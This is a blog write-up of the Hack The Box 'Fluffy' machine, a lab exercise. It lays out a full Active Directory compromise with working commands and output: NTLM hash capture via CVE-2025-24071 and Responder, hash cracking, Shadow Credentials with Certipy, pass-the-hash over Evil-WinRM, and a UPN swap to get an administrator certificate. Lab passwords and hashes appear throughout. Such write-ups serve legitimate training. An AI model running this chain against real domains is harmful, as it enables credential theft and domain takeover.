Fluffy HTB Walkthrough

Welcome to another Hack the Box exercise. In this blog post, I will show you how I pwned the Fluffy machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs. You can also test and grow your penetration testing skills, from gathering information to reporting. If you are new to this blog, please do not forget to like, comment, and subscribe to my YouTube channel (https://www.youtube.com/@BoltechTechnologies1) and also follow me on LinkedIn (https://www.linkedin.com/in/isiaq-ibrahim-468588156/) for more updates.

About the Machine

Fluffy is an easy-rated Windows machine on Hack the Box that takes players through a well-structured series of Active Directory exploitation techniques, emphasizing real-world misconfigurations in a corporate domain environment.

The box begins with SMB enumeration using valid credentials to access interesting files, including a PDF that references a real-world CVE—CVE-2025-24071, which involves NTLM hash leakage through .library-ms files. Leveraging this, the player captures NTLMv2 hashes using Responder, and cracks them with John the Ripper using the rockyou.txt wordlist.

With cracked credentials in hand, the user performs BloodHound enumeration via bloodhound-python to map out the AD environment, and uses bloodyAD to add a compromised user to a privileged group (SERVICE ACCOUNTS), exploiting misconfigured permissions.

The highlight of the machine revolves around Active Directory Certificate Services (AD CS) abuse. Using Certipy’s Shadow Credentials technique, the player escalates to the winrm_svc account, retrieves its NT hash, and gains remote shell access via Evil-WinRM.

Further escalation involves another Shadow Credentials attack against the ca_svc account. After modifying its userPrincipalName to administrator, a certificate is requested on its behalf—essentially granting full Domain Admin access. This final step involves requesting and using the certificate to extract the NT hash for the Administrator account and remotely execute commands with impacket-psexec, leading to the retrieval of root.txt.

The first step in pwning the Fluffy machine like I have always done in my previous writeups is to connect my Kali Linux terminal with Hack the Box server. To establish this connection, you need to run the following command in your terminal:

sudo openvpn fluffy.ovpn [sudo] password for boltech: 2025-07-02 01:13:38 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2025-07-02 01:13:38 Note: --data-ciphers-fallback with cipher 'AES-128-CBC' disables data channel offload. 2025-07-02 01:13:38 OpenVPN 2.6.14 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO] 2025-07-02 01:13:38 library versions: OpenSSL 3.5.0 8 Apr 2025, LZO 2.10 2025-07-02 01:13:38 DCO version: N/A 2025-07-02 01:13:38 TCP/UDP: Preserving recently used remote address: [AF_INET]23.106.53.206:1337 2025-07-02 01:13:38 Socket Buffers: R=[212992->212992] S=[212992->212992] 2025-07-02 01:13:38 UDPv4 link local: (not bound) 2025-07-02 01:13:38 UDPv4 link remote: [AF_INET]23.106.53.206:1337 2025-07-02 01:13:39 TLS: Initial packet from [AF_INET]23.106.53.206:1337, sid=9411d88e 00c2e2e4 2025-07-02 01:13:39 VERIFY OK: depth=2, C=GR, O=Hack The Box, OU=Systems, CN=HTB VPN: Root Certificate Authority 2025-07-02 01:13:39 VERIFY OK: depth=1, C=GR, O=Hack The Box, OU=Systems, CN=HTB VPN: sg-free-1 Issuing CA 2025-07-02 01:13:39 VERIFY KU OK 2025-07-02 01:13:39 Validating certificate extended key usage 2025-07-02 01:13:39 ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Server Authentication 2025-07-02 01:13:39 ++ Certificate has EKU (oid) 1.3.6.1.5.5.7.3.2, expects TLS Web Server Authentication 2025-07-02 01:13:39 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication 2025-07-02 01:13:39 VERIFY EKU OK 2025-07-02 01:13:39 VERIFY OK: depth=0, C=GR, O=Hack The Box, OU=Systems, CN=sg-free-1 2025-07-02 01:13:41 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 256 bits ED25519, signature: ED25519, peer temporary key: 253 bits X25519 2025-07-02 01:13:41 [sg-free-1] Peer Connection Initiated with [AF_INET]23.106.53.206:1337 2025-07-02 01:13:41 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1 2025-07-02 01:13:41 TLS: tls_multi_process: initial untrusted session promoted to trusted 2025-07-02 01:13:42 SENT CONTROL [sg-free-1]: 'PUSH_REQUEST' (status=1) 2025-07-02 01:13:43 PUSH: Received control message: 'PUSH_REPLY,route 10.10.10.0 255.255.254.0,route 10.129.0.0 255.255.0.0,route-ipv6 dead:beef::/64,explicit-exit-notify,tun-ipv6,route-gateway 10.10.14.1,topology subnet,ping 10,ping-restart 120,ifconfig-ipv6 dead:beef:2::1080/64 dead:beef:2::1,ifconfig 10.10.14.130 255.255.254.0,peer-id 9,cipher AES-256-CBC,protocol-flags cc-exit tls-ekm dyn-tls-crypt,tun-mtu 1500' 2025-07-02 01:13:43 OPTIONS IMPORT: --ifconfig/up options modified 2025-07-02 01:13:43 OPTIONS IMPORT: route options modified 2025-07-02 01:13:43 OPTIONS IMPORT: route-related options modified 2025-07-02 01:13:43 OPTIONS IMPORT: tun-mtu set to 1500 2025-07-02 01:13:43 net_route_v4_best_gw query: dst 0.0.0.0 2025-07-02 01:13:43 net_route_v4_best_gw result: via 192.168.196.2 dev eth0 2025-07-02 01:13:43 ROUTE_GATEWAY 192.168.196.2/255.255.255.0 IFACE=eth0 HWADDR=00:0c:29:6f:b7:ac 2025-07-02 01:13:43 GDG6: remote_host_ipv6=n/a 2025-07-02 01:13:43 net_route_v6_best_gw query: dst :: 2025-07-02 01:13:43 sitnl_send: rtnl: generic error (-101): Network is unreachable 2025-07-02 01:13:43 ROUTE6: default_gateway=UNDEF 2025-07-02 01:13:43 TUN/TAP device tun0 opened 2025-07-02 01:13:43 net_iface_mtu_set: mtu 1500 for tun0 2025-07-02 01:13:43 net_iface_up: set tun0 up 2025-07-02 01:13:43 net_addr_v4_add: 10.10.14.130/23 dev tun0 2025-07-02 01:13:43 net_iface_mtu_set: mtu 1500 for tun0 2025-07-02 01:13:43 net_iface_up: set tun0 up 2025-07-02 01:13:43 net_addr_v6_add: dead:beef:2::1080/64 dev tun0 2025-07-02 01:13:43 net_route_v4_add: 10.10.10.0/23 via 10.10.14.1 dev [NULL] table 0 metric -1 2025-07-02 01:13:43 net_route_v4_add: 10.129.0.0/16 via 10.10.14.1 dev [NULL] table 0 metric -1 2025-07-02 01:13:43 add_route_ipv6(dead:beef::/64 -> dead:beef:2::1 metric -1) dev tun0 2025-07-02 01:13:43 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1 2025-07-02 01:13:43 Initialization Sequence Completed 2025-07-02 01:13:43 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 9, compression: 'lzo' 2025-07-02 01:13:43 Timers: ping 10, ping-restart 120 2025-07-02 01:13:43 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt

This established a secure tunnel (tun0) to the HTB network using AES-256-CBC encryption and SHA256 authentication. I was assigned the IP 10.10.14.130 and received routes to internal labs. Once the initialization was complete, I could start enumerating and attacking the target machine from inside the HTB network.

Once the connection was successful, I started the target machine and I was assigned an IP address 10.10.11.69. The next step was performing enumeration using Nmap, I started by running a service and OS detection scan:

nmap -sCV -A 10.10.11.69 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 18:04 EDT Nmap scan report for fluffy.htb (10.10.11.69) Host is up (0.17s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-02 05:05:24Z) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-02T05:06:49+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-02T05:06:49+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-07-02T05:06:49+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.fluffy.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb | Not valid before: 2025-04-17T16:04:17 |_Not valid after: 2026-04-17T16:04:17 |_ssl-date: 2025-07-02T05:06:49+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (96%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (96%), Microsoft Windows 10 1903 - 21H1 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-02T05:06:12 |_ start_date: N/A |_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 169.78 ms 10.10.14.1 2 170.16 ms fluffy.htb (10.10.11.69) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25316.31 seconds

The scan revealed a Windows Domain Controller (DC01.fluffy.htb) with key ports open for DNS, Kerberos, LDAP, SMB, and WinRM. These confirmed the presence of an Active Directory environment. Based on the exposed services, I began enumerating SMB and LDAP for users and potential credentials, with an eye on leveraging Kerberos for ticket-based attacks.

Since many Kerberos-based operations depend on accurate time synchronization, I synced my machine’s clock with the Domain Controller using:

sudo ntpdate 10.10.11.69 [sudo] password for boltech: 2025-07-02 00:56:29.973384 (-0400) -1359.108876 +/- 0.161300 10.10.11.69 s1 no-leap CLOCK: time stepped by -1359.108876

This adjusted my system time by several hours to match the DC's clock, resolving any potential time skew issues that could prevent Kerberos authentication or ticket validation during certificate-based exploitation. Next, I attempted to use smbmap, a tool for enumerating SMB shares and their permissions. I ran the following command in my terminal:

smbmap -H 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB connections(s) and 1 authenticated session(s) [+] IP: 10.10.11.69:445 Name: fluffy.htb Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC IT READ, WRITE NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share [*] Closed 1 connections

The IT share was found to be readable and writable, which made it a prime target for file enumeration and potential file upload (e.g., for initial access). Additionally, I noted that NETLOGON and SYSVOL were accessible in read-only mode, which suggested the presence of a Windows Active Directory environment and could later be leveraged for GPP or script-based enumeration.

1.    IT share is both readable and writable:

• You can download files (smbclient, smbget) and upload payloads (e.g., reverse shells or malicious scripts).
• Good candidate for initial foothold or lateral movement.

2.    NETLOGON and SYSVOL:

• These are standard shares on Domain Controllers.
• May contain GPP (Group Policy Preferences) files with encrypted credentials (Groups.xml), or scripts that leak information (like domain users, passwords, or PowerShell scripts).

3.    IPC$ (Read Only):

• May allow for named pipe attacks (e.g., using rpcclient or smbexec) if additional access is gained later.

Afterward, I authenticated to the SMB share \\10.10.11.69\IT using the credentials written on the machines page (J0elTHEM4n1990!) for j.fleischman by running:

smbclient //10.10.11.69/IT -U j.fleischman Password for [WORKGROUP\j.fleischman]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jul 2 14:56:09 2025 .. D 0 Wed Jul 2 14:56:09 2025 Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025 Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025 KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025 KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025 Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025 5842943 blocks of size 4096. 2252416 blocks available

Listing the directory revealed a number of files and folders, including a KeePass archive and a PDF file:

• KeePass-2.58.zip
• Upgrade_Notice.pdf
• Everything-1.4.1.1026.x64.zip

I proceeded to download these files for offline analysis, looking for credentials or additional system information that could be leveraged further in the attack chain.

I downloaded the Upgrade_Notice.pdf, and found out that the PDF contains information about several recent vulnerabilities like CVE-2025-24996, CVE-2025-24071, CVE-2025-46785, CVE-2025-29968, CVE-2025-21193, and CVE-2025-3445 with severity from critical to low. (Note: To download the PDF, run get Upgrade_Notice.pdf in the shell and this will save the PDF file in the directory you are currently working in. You can also download the other files and check what's in them.)

Reading through the CVE's, one that stood out was CVE-2025-24071, which describes a vulnerability in Windows Explorer where simply extracting a .library-ms file from a ZIP or RAR archive could leak the user's NTLM hash via a crafted SMB path.

I searched for the CVE-2025-24071 on google and found a GitHub repository, then cloned it and navigated into it to run the proof of concept Python file (poc.py). I cloned the repository using:

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git Cloning into 'CVE-2025-24071_PoC'... remote: Enumerating objects: 18, done. remote: Counting objects: 100% (18/18), done. remote: Compressing objects: 100% (16/16), done. remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0) Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.

python poc.py Enter your file name: documents Enter IP (EX: 192.168.1.162): 10.10.11.69 completed

When I ran the poc.py, I was prompted to enter the name of my file and I entered documents. Next, it prompted me to enter IP address, using ifconfig, I found the tun0 IP address 10.10.14.81 and entered it.

ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.196.130 netmask 255.255.255.0 broadcast 192.168.196.255 inet6 fe80::20c:29ff:fe6f:b7ac prefixlen 64 scopeid 0x20<link> ether 00:0c:29:6f:b7:ac txqueuelen 1000 (Ethernet) RX packets 7176 bytes 3896622 (3.7 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8558 bytes 1842292 (1.7 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 24 bytes 1440 (1.4 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 24 bytes 1440 (1.4 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500 inet 10.10.14.81 netmask 255.255.254.0 destination 10.10.14.81 inet6 dead:beef:2::104f prefixlen 64 scopeid 0x0<global> inet6 fe80::a105:670:4791:11d0 prefixlen 64 scopeid 0x20<link> unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC) RX packets 846 bytes 317460 (310.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 3293 bytes 194464 (189.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Next, I set up a Responder listener to capture any authentication attempts from the target:

# responder -I tun0 -wvF __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.6.0 To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [ON] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [tun0] Responder IP [10.10.14.81] Responder IPv6 [dead:beef:2::104f] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] Don't Respond To MDNS TLD ['_DOSVC'] TTL for poisoned response [default] [+] Current Session Variables: Responder Machine Name [WIN-LQ972C0N07K] Responder Domain Name [GR0X.LOCAL] Responder DCE-RPC Port [48342]

Responder is a network poisoning tool that listens for specific types of name resolution traffic in Windows environments — such as:

• LLMNR (Link-Local Multicast Name Resolution)
• NBT-NS (NetBIOS Name Service)
• MDNS (Multicast DNS)
• WPAD (Web Proxy Auto-Discovery)

It exploits misconfigured or legacy systems by impersonating servers and capturing NTLMv2 hashes when the victim tries to connect to a non-existent resource.

After placing a malicious .library-ms file in the writable IT share and waiting for extraction, the target system attempted to authenticate back to my machine via SMB. Responder intercepted the traffic and successfully captured several NTLMv2 hashes:

[SMB] NTLMv2-SSP Username : FLUFFY\p.agila [SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:2ee0b47a52e55699:CA8807F6CAEC0B93379F2EF5D5DB4C1F:01010000000000000069471D28EBDB01A05E0483806D123400000000020008004D0050004500330001001E00570049004E002D004900420036005700570048004A00590048003500580004003400570049004E002D004900420036005700570048004A0059004800350058002E004D005000450033002E004C004F00430041004C00030014004D005000450033002E004C004F00430041004C00050014004D005000450033002E004C004F00430041004C00070008000069471D28EBDB010600040002000000080030003000000000000000010000000020000060239DD078B1525535E77FBD4FD43E72984A7DC698F56809D6A222C036F1F7ED0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380031000000000000000000

I saved the hash and attempted cracking it using john with a common wordlist:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status prometheusx-303 (p.agila) 1g 0:00:00:00 DONE (2025-07-02 15:49) 1.098g/s 4964Kp/s 4964Kc/s 4964KC/s prrm18652886..programmer_pt Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.

I used john to crack the captured NTLMv2 hash:

John successfully recovered the plaintext password:

• Username: p.agila
• Password: prometheusx-303

With these credentials, I was now able to authenticate against SMB and WinRM for further enumeration and privilege escalation.

Using the credentials harvested from the NTLMv2 hash (user: p.agila, password: prometheusx-303), I authenticated against the domain and used bloodhound-python to enumerate Active Directory:

This collected:

• 10 users
• 54 groups
• 2 GPOs
• 1 computer (DC01)
• All relevant AD relationships

The results were saved into a .zip archive for analysis in the BloodHound GUI. Using BloodHound GUI, I found that the user P.AGILA@FLUFFY.HTB is a member of SERVICE ACCOUNT MAGAGERS@FLUFFY.HTB and its generic to SERVICE ACCOUNT@FLUFFY.HTB.

I noticed that the user p.agila can be added to the user group. SERVICE ACCOUNTS@HTB has relationship with WINRM_SVC@FLUFFY.HTB, LDAP_SVC@FLUFFY.HTB, CA_SVC@FLUFFY.HTB. The group has write permissions service for the user CA_SVC.

I used bloodyAD to attempt a privilege escalation by adding my compromised user p.agila to the SERVICE ACCOUNTS group. Since the user had sufficient rights (likely WriteMembers or GenericWrite), the command executed successfully:

bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303' add groupMember 'SERVICE ACCOUNTS' p.agila [+] p.agila added to SERVICE ACCOUNTS

This allowed me to escalate my access and prepare for further exploitation such as delegation abuse or service impersonation.

I used Certipy to perform a Shadow Credentials attack against the service account WINRM_SVC. Since my compromised user p.agila had write access to the target’s msDS-KeyCredentialLink, I was able to inject a certificate, authenticate as WINRM_SVC, and extract its NTLM hash without needing its password:

certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'WINRM_SVC' -dc-ip '10.10.11.69' Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Targeting user 'winrm_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '21257071-eb26-c234-b30e-6153f1617fe0' [*] Adding Key Credential with device ID '21257071-eb26-c234-b30e-6153f1617fe0' to the Key Credentials for 'winrm_svc' [*] Successfully added Key Credential with device ID '21257071-eb26-c234-b30e-6153f1617fe0' to the Key Credentials for 'winrm_svc' [*] Authenticating as 'winrm_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'winrm_svc@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'winrm_svc.ccache' [*] Wrote credential cache to 'winrm_svc.ccache' [*] Trying to retrieve NT hash for 'winrm_svc' [*] Restoring the old Key Credentials for 'winrm_svc' [*] Successfully restored the old Key Credentials for 'winrm_svc' [*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

The NT hash for WINRM_SVC was retrieved: 33bd09dcd697600edf6b3a7af4875767. This gave me full control of the account and the ability to pivot or escalate further. With the NTLM hash of the winrm_svc user (33bd09dcd697600edf6b3a7af4875767) obtained via Shadow Credentials, I launched a remote shell using Evil-WinRM. Evil-WinRM is a post-exploitation tool that allows remote PowerShell access to a Windows host over WinRM (Windows Remote Management).

evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ../desktop/user.txt 23e52fbe5313c09f2d401f82f639c8aa *Evil-WinRM* PS C:\Users\winrm_svc\Documents>

After successfully authenticating, I navigated to the user's desktop and retrieved the user flag:

• cd ../desktop
• ls
• cat user.txt

Hurray!!! I got the user flag

After compromising the p.agila user and being added to the SERVICE ACCOUNTS group (which had write permissions over other users), I launched a Shadow Credentials attack on the ca_svc account using Certipy:

certipy-ad shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Targeting user 'ca_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID 'a5dcaab9-7379-b3a5-f351-62d7f8ffae04' [*] Adding Key Credential with device ID 'a5dcaab9-7379-b3a5-f351-62d7f8ffae04' to the Key Credentials for 'ca_svc' [*] Successfully added Key Credential with device ID 'a5dcaab9-7379-b3a5-f351-62d7f8ffae04' to the Key Credentials for 'ca_svc' [*] Authenticating as 'ca_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'ca_svc@fluffy.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'ca_svc.ccache' [*] Wrote credential cache to 'ca_svc.ccache' [*] Trying to retrieve NT hash for 'ca_svc' [*] Restoring the old Key Credentials for 'ca_svc' [*] Successfully restored the old Key Credentials for 'ca_svc' [*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

This allowed me to inject a rogue certificate, authenticate as ca_svc, and extract their NTLM hash: NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8. With this, I can now use Pass-the-Hash to impersonate a high-privilege user, likely giving access to sensitive services such as Domain Controller administration or Certificate Authority manipulation.

After obtaining the Kerberos Ticket Granting Ticket (TGT) for the ca_svc account using Certipy, the tickets were saved into the ca_svc.ccache file. To use these tickets with Kerberos-aware tools, I set the environment variable KRB5CCNAME to point to this cache:

This allowed me to perform subsequent actions as ca_svc by reusing the existing Kerberos tickets without needing the password.

Using Certipy, I enumerated Active Directory Certificate Services (AD CS) as the ca_svc user. The tool discovered one Certificate Authority (fluffy-DC01-CA) and multiple certificate templates, but none appeared immediately vulnerable or allowed web enrollment. However, a security extension (ESC16) was disabled, indicating a potential misconfiguration that might be exploitable with additional research or in conjunction with other findings.

certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Successfully retrieved CA configuration for 'fluffy-DC01-CA' [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Enumeration output: Certificate Authorities 0 CA Name : fluffy-DC01-CA DNS Name : DC01.fluffy.htb Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5 Certificate Validity Start : 2025-04-17 16:00:16+00:00 Certificate Validity End : 3024-04-17 16:11:16+00:00 Web Enrollment HTTP Enabled : False HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Disabled Extensions : 1.3.6.1.4.1.311.25.2 Permissions Owner : FLUFFY.HTB\Administrators Access Rights ManageCa : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators ManageCertificates : FLUFFY.HTB\Domain Admins FLUFFY.HTB\Enterprise Admins FLUFFY.HTB\Administrators Enroll : FLUFFY.HTB\Cert Publishers [!] Vulnerabilities ESC16 : Security Extension is disabled. [*] Remarks ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details. Certificate Templates : [!] Could not find any certificate templates

I enumerated the attributes of the ca_svc account using Certipy to validate its SPN (ADCS/ca.fluffy.htb), UPN, and SID. This step confirmed that the account was associated with Active Directory Certificate Services and could be used in further certificate-based attacks. The userAccountControl flag also revealed that the password never expires, reducing the chance of operational disruption when impersonating this account.

certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Reading attributes for 'ca_svc': cn : certificate authority service distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb name : certificate authority service objectSid : S-1-5-21-497550768-2797716248-2627064577-1103 sAMAccountName : ca_svc servicePrincipalName : ADCS/ca.fluffy.htb userPrincipalName : ca_svc@fluffy.htb userAccountControl : 66048 whenCreated : 2025-04-17T16:07:50+00:00 whenChanged : 2025-07-03T03:30:24+00:00

Using Certipy, I enumerated the ca_svc user account attributes in Active Directory. This account is a service account for the AD Certificate Services (servicePrincipalName: ADCS/ca.fluffy.htb). The user account is active and appears to be linked with the certificate authority infrastructure, making it an important target for further privilege escalation or certificate-based attacks.

I used Certipy to update the ca_svc account’s User Principal Name (UPN) to administrator. Changing the UPN can be useful for abusing Kerberos or certificate-based authentication flows, possibly enabling privilege escalation or bypassing certain controls related to the original service account name.

certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update Certipy v5.0.2 - by Oliver Lyak (ly4k) [*] Updating user 'ca_svc': userPrincipalName : administrator [*] Successfully updated 'ca_svc'

After modifying the ca_svc account's UPN to administrator, I leveraged Certipy to request a certificate using the User template from the CA fluffy-DC01-CA. Since the UPN was now set to administrator, the certificate was issued with elevated privileges. The resulting .pfx file can be used to impersonate the domain administrator and obtain a Kerberos TGT without needing the actual administrator password.

